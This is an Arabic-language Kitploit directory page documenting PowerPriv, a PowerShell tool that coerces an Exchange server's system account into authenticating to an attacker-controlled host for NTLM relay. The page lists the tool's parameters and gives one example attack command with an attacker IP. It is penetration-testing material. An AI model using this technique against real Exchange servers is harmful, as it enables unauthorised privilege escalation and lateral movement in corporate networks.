Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PowerPriv — تطبيق باورشيل لأداة PrivExchange مصمم للتشغيل في سياق المستخدم الحالي | Kitploit
أدوات/GitHubGitHub/g0ldengunsec/powerpriv
تصعيد الامتيازاتالاستغلالالحركة الجانبيةاختبار الاختراقالمصادقة
GitHubg0ldengunsec/powerpriv

PowerPriv

تطبيق باورشيل لأداة PrivExchange مصمم للتشغيل في سياق المستخدم الحالي

عرض المستودع
12524منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PowerPriv

الوصف

تطبيق بلغة PowerShell لأداة PrivExchange من @_dirkjan (الكود الأصلي موجود هنا: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) مفيد في البيئات التي لا يمكن فيها تشغيل التطبيقات المبنية على Python، أو تتوفر لديك بيانات اعتماد مستخدم، أو لا تريد حفظ ملفات على القرص. سيؤدي إلى محاولة حساب النظام الخاص بخادم Exchange الهدف المصادقة على نظام من اختيارك.

-targetHost

اسم المضيف أو عنوان IP لصندوق Exchange الهدف. بناءً على إعدادات DNS، قد يتطلب اسمًا مؤهلًا بالكامل إذا تم استخدام اسم المضيف. (مطلوب)

-attackerHost

اسم المضيف أو عنوان IP لنظام تتحكم أنت به، ويفضل أن يكون ntlmrelayx قيد التشغيل عليه. نحن نخبر خادم Exchange بمحاولة المصادقة على هذا النظام. بناءً على إعدادات DNS، قد يتطلب اسمًا مؤهلًا بالكامل إذا تم استخدام اسم المضيف. (مطلوب)

-exchangePort

المنفذ المستخدم للاتصال بخادم Exchange. القيمة الافتراضية هي 443.

-attackerPort

المنفذ الذي يجب أن يحاول Exchange الاتصال من خلاله مرة أخرى إلى المهاجم. القيمة الافتراضية هي 80

-attackerPage

الصفحة التي نخبر خادم Exchange بالاتصال بها على نظام الهجوم الخاص بنا. ليست هناك حاجة إلى الشرط المائلة. القيمة الافتراضية هي powerPriv.

-noSSL

اضبط على true إذا كنت لا تريد استخدام https للاتصال الأولي بخادم Exchange. القيمة الافتراضية هي false (استخدم https).

-Version

إصدار خادم Exchange الذي نستهدفه. القيمة الافتراضية هي 2013.

مثال

root@kitploit:~
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

ملاحظات

root@kitploit:~
المؤلف: @g0ldenGunSec  - بناءً على الأداة التي أنشأها @_dirkjan
استخدم هذه الأداة فقط على الشبكات التي تمتلكها أو لديك إذن لاختبارها.
تنزيل الأداة